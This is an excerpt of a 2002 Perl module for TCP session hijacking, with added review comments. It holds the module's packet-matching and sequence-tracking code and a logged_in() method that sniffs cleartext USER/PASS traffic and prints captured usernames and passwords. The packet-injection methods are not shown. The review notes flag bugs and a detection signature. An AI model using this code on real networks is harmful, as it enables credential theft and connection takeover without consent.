package hijack;

# Module to store all the hijacking stuff.
# This module can be run in stateful or stateless mode.
# Currently it only supports TCP hijacking methods like:
#  - injecting a packet
#  - greet the victim client
#  - resetting a connection
#
# For more information please read the POD documentation.
#
# Programmed by Bastian Ballmann [ bytebeater@crazydj.de ]
# http://www.crazydj.de
#
# Last Update: 28.11.2002
#
# This code is licensed under the GPL
#
# Reader's guide to this excerpt (the injection/reset methods named above
# are not part of this excerpt; only the packet-classification and
# connection-state bookkeeping is visible here):
#
#  - Every method that takes a "packet" expects a raw libpcap frame and
#    decodes it as Ethernet -> IP -> TCP with NetPacket. Only TCP over IPv4
#    is handled; nothing checks the protocol field, so a non-TCP frame is
#    decoded as if it were TCP.
#  - Matching methods (check, check_port, check_ip) compare addresses and
#    ports with the string operators eq/ne on the dotted-quad and numeric
#    fields as NetPacket returns them.
#  - A segment whose TCP window size is exactly 2323 is never treated as
#    part of the observed connection (see check()). The visible code does
#    not explain the value; presumably the module's own outbound segments
#    carry that window size so they are not re-processed — TODO confirm
#    against the injection methods further down in the file. From a
#    detection standpoint, a constant, unusual window size like this is a
#    concrete signature of traffic produced by this tool.
#
# NOTE(review): the file enables neither `use strict` nor `use warnings`.
# Most subs store the decoded headers in the package globals $ip and $tcp
# rather than lexicals; new() also writes the globals $class and $packet,
# stateless() and is_hijacked() write $obj, and check_flag() writes %flags.
# These values leak between calls and are shared by every method.

###[ Loading modules ]###

use NetPacket::Ethernet qw(:strip); # Decoding ethernet packets (exports eth_strip)
use NetPacket::IP qw(:strip);       # Decoding IP packets
use NetPacket::TCP;                 # Decoding TCP packets
use Net::RawIP;                     # Creating raw packets (not used in this excerpt;
                                    # presumably needed by the injection methods)

###[ Constructor ]###

# Builds a hijack object from a Net::PcapUtils packet reference.
# Only TCP/IP is supported at the moment.
# The default mode is stateless, i.e. by default no distinction is made
# between server and client: the object simply remembers the addresses,
# ports, sequence/acknowledgement numbers and flags of the packet it was
# constructed from.
# Parameter: Pcap packet object
# Returns: the blessed object
sub new
{
    # NOTE(review): $class and $packet are assigned without `my`, so they
    # are package globals, not lexicals.
    ($class, $packet) = @_;
    my $obj = {};

    # Decode packet (Ethernet header stripped, then IP, then TCP)
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};         # Current source ip (stateless mode)
    $obj->{dest_ip} = $ip->{dest_ip};       # Current destination ip (stateless mode)
    $obj->{src_port} = $tcp->{src_port};    # Current source port (stateless mode)
    $obj->{dest_port} = $tcp->{dest_port};  # Current destination port (stateless mode)
    $obj->{seqnum} = $tcp->{seqnum};        # Current sequence number (stateless mode)
    $obj->{acknum} = $tcp->{acknum};        # Current acknowledgement number (stateless mode)
    $obj->{flags} = $tcp->{flags};          # Current TCP flags
    $obj->{hijacked} = [];                  # Array to store hijacked connections ("src dst" strings, see is_hijacked)
    $obj->{login_flag} = 0;                 # Flag to remember if we have seen a correct login process (see logged_in)
    $obj->{stateful} = 0;                   # Flag to remember if we run in stateless or stateful mode
    $obj->{server_ip} = "";                 # Server IP (stateful mode)
    $obj->{client_ip} = "";                 # Client IP (stateful mode)
    $obj->{server_port} = "";               # Server Port (stateful mode)
    $obj->{client_port} = "";               # Client Port (stateful mode)
    $obj->{server_seq} = "";                # Server sequence number (stateful mode)
    $obj->{server_ack} = "";                # Server acknowledgement number (stateful mode)
    $obj->{client_seq} = "";                # Client sequence number (stateful mode)
    $obj->{client_ack} = "";                # Client acknowledgement number (stateful mode)

    return bless($obj,$class);
}

###[ General methods ]###

# Method check() tests whether the packet belongs to "our" connection.
# Stateful mode: the packet must travel either server->client or
# client->server with exactly the remembered address/port pairs.
# Stateless mode: the packet must match the remembered (src,dst) pair in
# either direction.
# In both modes a segment with a TCP window size of 2323 is rejected
# (see the module header for what that value appears to mean).
# Parameter: Pcap packet object
# Returns: 1 if the packet belongs to the observed connection, else 0
sub check
{
    my ($obj,$packet) = @_;
    my ($src_ip,$dest_ip,$src_port,$dest_port);   # NOTE(review): declared but never used

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
        # The packet travels from the server to our client
        if( ($obj->{server_ip} eq $ip->{src_ip}) && ($obj->{client_ip} eq $ip->{dest_ip})
            && ($obj->{server_port} eq $tcp->{src_port}) && ($obj->{client_port} eq $tcp->{dest_port})
            && ($tcp->{winsize} ne "2323") )
        {
            return 1;
        }
        # The packet comes from our client and is headed for the server
        elsif( ($obj->{client_ip} eq $ip->{src_ip}) && ($obj->{server_ip} eq $ip->{dest_ip})
               && ($obj->{client_port} eq $tcp->{src_port}) && ($obj->{server_port} eq $tcp->{dest_port})
               && ($tcp->{winsize} ne "2323") )
        {
            return 1;
        }
        else
        {
            return 0;
        }
    }
    # We are running in stateless mode
    else
    {
        # Same direction as the packet we last recorded
        if( ($obj->{src_ip} eq $ip->{src_ip}) && ($obj->{dest_ip} eq $ip->{dest_ip})
            && ($obj->{src_port} eq $tcp->{src_port}) && ($obj->{dest_port} eq $tcp->{dest_port})
            && ($tcp->{winsize} ne "2323") )
        {
            return 1;
        }
        # Opposite direction of the packet we last recorded
        elsif( ($obj->{src_ip} eq $ip->{dest_ip}) && ($obj->{dest_ip} eq $ip->{src_ip})
               && ($obj->{src_port} eq $tcp->{dest_port}) && ($obj->{dest_port} eq $tcp->{src_port})
               && ($tcp->{winsize} ne "2323") )
        {
            return 1;
        }
        else
        {
            return 0;
        }
    }
}

# Method check_port() tests whether the packet carries the wanted source
# and/or destination port.
# Parameter: packet object, src and dest port
# If one of the ports is of no interest, pass either 0 or "NULL" for it.
# (The string "NULL" numifies to 0, so `== 0` alone already covers it; the
# extra `eq "NULL"` test is redundant but harmless.)
# Returns: 1 if the ports of interest match, else 0
sub check_port
{
    my ($obj,$packet,$src_port,$dst_port) = @_;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Source port is of no interest, check only the destination port
    if( ($src_port == 0) || ($src_port eq "NULL") )
    {
        if($tcp->{dest_port} eq $dst_port) { return 1; } else { return 0; }
    }
    # Destination port is of no interest, check only the source port
    elsif( ($dst_port == 0) || ($dst_port eq "NULL") )
    {
        if($tcp->{src_port} eq $src_port) { return 1; } else { return 0; }
    }
    # Check that both ports match
    else
    {
        if( ($tcp->{src_port} eq $src_port) && ($tcp->{dest_port} eq $dst_port) ) { return 1; } else { return 0; }
    }
}

# Method check_ip() tests whether the packet carries the wanted source
# and/or destination IP.
# If one of the IPs is of no interest, pass either 0 or "NULL" for it.
# Parameter: packet object, src and dest ip
# Returns: 1 if the IPs of interest match, else 0
#
# NOTE(review): the wildcard tests use the numeric `==`. A dotted quad
# numifies to its leading integer, so an address such as "0.x.x.x" is
# treated as "don't care" here, and `$src_ip == "NULL"` is the same test
# as `$src_ip == 0` (the `eq "NULL"` form used for $dst_ip was probably
# intended).
sub check_ip
{
    my ($obj,$packet,$src_ip,$dst_ip) = @_;

    # Decode packet (only the IP header is needed here)
    $ip = NetPacket::IP->decode(eth_strip($packet));

    # Source IP is of no interest
    if( ($src_ip == 0) || ($src_ip == "NULL") )
    {
        if($dst_ip eq $ip->{dest_ip}) { return 1; } else { return 0; }
    }
    # Destination IP is of no interest
    elsif( ($dst_ip == 0) || ($dst_ip eq "NULL") )
    {
        if($src_ip eq $ip->{src_ip}) { return 1; } else { return 0; }
    }
    # Check both IPs
    elsif( ($ip->{src_ip} eq $src_ip) && ($ip->{dest_ip} eq $dst_ip) )
    {
        return 1;
    }
    else
    {
        return 0;
    }
}

# Method check_flag() tests whether the packet has the wanted TCP flag set.
# Parameter: packet object, flag name (one of urg ack psh rst syn fin,
# case-insensitive)
# Returns: 1 if the flag bit is set, else 0. An unknown flag name yields
# an undefined mask and therefore 0.
sub check_flag
{
    my($obj,$packet,$flag) = @_;
    $flag = lc($flag);

    # Decode the packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Bit masks of the TCP flags field (package global %flags, rebuilt on
    # every call).
    $flags{urg} = 0x20;
    $flags{ack} = 0x10;
    $flags{psh} = 0x08;
    $flags{rst} = 0x04;
    $flags{syn} = 0x02;
    $flags{fin} = 0x01;

    if($tcp->{flags} & $flags{$flag}) { return 1; } else { return 0; }
}

# Method stateful() records the server / client roles from a packet, so
# that the module afterwards knows which direction a packet belongs to.
# Only the sequence/acknowledgement numbers of the side the packet came
# from are recorded; the other side's numbers stay as they were (see
# set_server_seq / set_client_seq).
# Parameter: Net::PcapUtils packet object, source ("server"|"client")
# Returns: the object; an unknown source only prints a message and the
# object is still switched to stateful mode.
sub stateful
{
    my($obj,$packet,$src) = @_;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    # Connection should be observed in stateful mode
    $obj->{stateful} = 1;

    # The packet comes from the server
    if($src eq "server")
    {
        $obj->{server_ip} = $ip->{src_ip};
        $obj->{client_ip} = $ip->{dest_ip};
        $obj->{server_port} = $tcp->{src_port};
        $obj->{client_port} = $tcp->{dest_port};
        $obj->{server_seq} = $tcp->{seqnum};
        $obj->{server_ack} = $tcp->{acknum};
    }
    # The packet comes from the client
    elsif($src eq "client")
    {
        $obj->{server_ip} = $ip->{dest_ip};
        $obj->{client_ip} = $ip->{src_ip};
        $obj->{server_port} = $tcp->{dest_port};
        $obj->{client_port} = $tcp->{src_port};
        $obj->{client_seq} = $tcp->{seqnum};
        $obj->{client_ack} = $tcp->{acknum};
    }
    else
    {
        print "Unkown option $src in method stateful()\n";
    }

    return $obj;
}

# Method stateless() tells the module that we no longer want to run in
# stateful mode. The server/client fields are left untouched.
# Returns: the object
sub stateless
{
    $obj = shift;   # NOTE(review): no `my`, writes the package global $obj
    $obj->{stateful} = 0;
    return $obj;
}

# Method set_server_seq() stores the server sequence and acknowledgement
# number from a packet. Only allowed in stateful mode.
# Parameter: Net::PcapUtils packet object
# Returns: the object, or 0 (after printing a message) in stateless mode
#
# NOTE(review): the key `ackum` does not exist on the decoded TCP header —
# the rest of this file reads `acknum` — so server_ack is set to undef by
# this method, which in turn makes server_seq()/is_hijackable() report
# false afterwards.
sub set_server_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful})
    {
        print "You are not running in stateful mode.\n";
        print "set_server_seq() aborts!\n";
        return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{server_seq} = $tcp->{seqnum};
    $obj->{server_ack} = $tcp->{ackum};

    return $obj;
}

# Method set_client_seq() stores the client sequence and acknowledgement
# number from a packet. Only allowed in stateful mode.
# Parameter: Net::PcapUtils packet object
# Returns: the object, or 0 (after printing a message) in stateless mode
#
# NOTE(review): same misspelled `ackum` key as in set_server_seq(), so
# client_ack ends up undef.
sub set_client_seq
{
    my($obj,$packet) = @_;

    # Are we running in stateful mode?
    unless($obj->{stateful})
    {
        print "You are not running in stateful mode.\n";
        print "set_client_seq() aborts!\n";
        return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{client_seq} = $tcp->{seqnum};
    $obj->{client_ack} = $tcp->{ackum};

    return $obj;
}

# Method server_seq() returns true when the server's sequence and
# acknowledgement numbers are known (both set and non-zero; the explicit
# `!= 0` tests are redundant with the truthiness tests before them).
# Returns: 1 or 0
sub server_seq
{
    my $obj = shift;

    if( ($obj->{server_seq}) && ($obj->{server_ack})
        && ($obj->{server_seq} != 0) && ($obj->{server_ack} != 0) ) { return 1 } else { return 0; }
}

# Method client_seq() returns true when the client's sequence and
# acknowledgement numbers are known (both set and non-zero).
# Returns: 1 or 0
sub client_seq
{
    my $obj = shift;

    if( ($obj->{client_seq}) && ($obj->{client_ack})
        && ($obj->{client_seq} != 0) && ($obj->{client_ack} != 0) ) { return 1; } else { return 0; }
}

# Method is_established() tests whether the TCP handshake has already
# completed — more precisely, whether this is not a SYN or SYN/ACK segment.
# Note that "established" here means only "SYN flag not set": RST- or
# FIN-only segments also count as established.
# Parameter: packet object
# Returns: 0 if the SYN flag is set, else 1
sub is_established
{
    my($obj,$packet) = @_;

    # Does the packet have the SYN flag set?
    if($obj->check_flag($packet,"syn")) { return 0; } else { return 1; }
}

# Method logged_in() tries to follow a login exchange by looking for the
# strings USER and PASS (and "login" / "password") in the TCP payload.
# The payload of the packet following a login or password prompt is
# printed and stored in $obj->{login} / $obj->{password}; seeing a
# "last login" message sets login_flag to 3 and reports a completed login.
# This method is still too buggy to use (author's note).
# Parameter: packet object
# Returns: 1 once a "last login" message is seen, else 0
#
# NOTE(review): two defects are visible here. The first branch writes
# `$obj->{loign_flag}` (typo), so login_flag is never set to 1 and the
# "User ..." branch below is dead. The `/last\s*login/ig` matches are
# evaluated in scalar context with /g, which advances pos() on $payload
# and can make repeated matches on the same string behave differently.
# Also note that this works only on cleartext payloads; it is one concrete
# illustration of why unencrypted login protocols are a risk.
sub logged_in
{
    my($obj,$packet) = @_;

    # Decode packet (lexicals here, unlike the other methods)
    my $ip = NetPacket::IP->decode(eth_strip($packet));
    my $tcp = NetPacket::TCP->decode($ip->{data});
    my $payload = $tcp->{data};

    # Login prompt (but not a "last login" banner)
    if( (($payload =~ /USER/i) || ($payload =~ /login/i)) && !($payload =~ /last\s*login/ig) )
    {
        print "Found login string\n";
        $obj->{loign_flag} = 1;
        return 0;
    }
    # Password prompt
    elsif(($payload =~ /password/i) || ($payload =~ /PASS/i))
    {
        print "Found password string\n";
        $obj->{login_flag} = 2;
        return 0;
    }
    # "Last login" banner, i.e. the login succeeded
    elsif($payload =~ /last\s*login/ig)
    {
        print "Found last login message\n";
        $obj->{login_flag} = 3;
    }

    # The packet after a login prompt carries the user name
    if($obj->{login_flag} == 1)
    {
        $obj->{login} = $payload;
        $obj->{login_flag} = 0;
        print "User $payload\n";
    }
    # The packet after a password prompt carries the password
    elsif($obj->{login_flag} == 2)
    {
        $obj->{password} = $payload;
        $obj->{login_flag} = 0;
        print "Password $payload\n";
    }

    if($obj->{login_flag} == 3)
    {
        print "User logged in\n";
        return 1;
    }
    else
    {
        return 0;
    }
}

# Method update() refreshes the object's connection fields from a
# Net::PcapUtils packet object.
# This method updates the connection information in stateless mode only.
# Parameter: packet object
# Returns: the object, or 0 (after printing a message) in stateful mode
sub update
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
        print "You are running in stateful mode.\n";
        print "update() aborted!\n";
        return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{src_ip} = $ip->{src_ip};
    $obj->{dest_ip} = $ip->{dest_ip};
    $obj->{src_port} = $tcp->{src_port};
    $obj->{dest_port} = $tcp->{dest_port};
    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};
    $obj->{flags} = $tcp->{flags};

    return $obj;
}

# Method update_seq() refreshes only the sequence and acknowledgement
# number.
# This method updates the connection information in stateless mode only.
# Parameter: packet object
# Returns: the object, or 0 (after printing a message) in stateful mode
sub update_seq
{
    my ($obj, $packet) = @_;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
        print "You are running in stateful mode.\n";
        print "update_seq() aborted!\n";
        return 0;
    }

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    $obj->{seqnum} = $tcp->{seqnum};
    $obj->{acknum} = $tcp->{acknum};

    return $obj;
}

# Method is_hijackable() tests whether enough state has been collected,
# i.e. whether the sequence and acknowledgement numbers have been read:
# both sides' numbers in stateful mode, the current pair in stateless mode.
# Returns: 1 or 0
sub is_hijackable
{
    my $obj = shift;

    # Are we running in stateful mode?
    if($obj->{stateful})
    {
        if( ($obj->{client_seq}) && ($obj->{client_ack})
            && ($obj->{server_seq}) && ($obj->{server_ack}) ) { return 1; } else { return 0; }
    }
    # We are running in stateless mode
    else
    {
        if( ($obj->{seqnum}) && ($obj->{acknum}) ) { return 1; } else { return 0; }
    }
}

# Method is_hijacked() remembers that we have already hijacked this
# connection, by appending "src_ip dest_ip" to the hijacked array.
# Parameter: Pcap packet object
# Returns: the object
#
# NOTE(review): the key `dst_ip` does not exist on the decoded IP header —
# every other method in this file reads `dest_ip` — so the stored entry is
# "src_ip " followed by an empty string.
sub is_hijacked
{
    $obj = shift;   # NOTE(review): no `my`, writes the package global $obj
    my $packet = shift;

    # Decode packet
    $ip = NetPacket::IP->decode(eth_strip($packet));
    $tcp = NetPacket::TCP->decode($ip->{data});

    push @{$obj->{hijacked}},$ip->{src_ip} . " " . $ip->{dst_ip};

    return $obj;
}

# This method removes one or all entries from the hijacked array so that
# the connection can be hijacked again.
# A source and destination IP may be given to select the entry to remove.
# If no parameter is given, the whole array is cleared.
# (The body of this method continues beyond this excerpt.)
sub unset_hijacked
{
    my $obj = shift;
    my $src = shift;
    my $dst = shift;

    # Remove a single entry identified by source and destination IP
    if(($src ne "") && ($dst ne ""))
    {
        # Search the hijacked array for the source and destination IP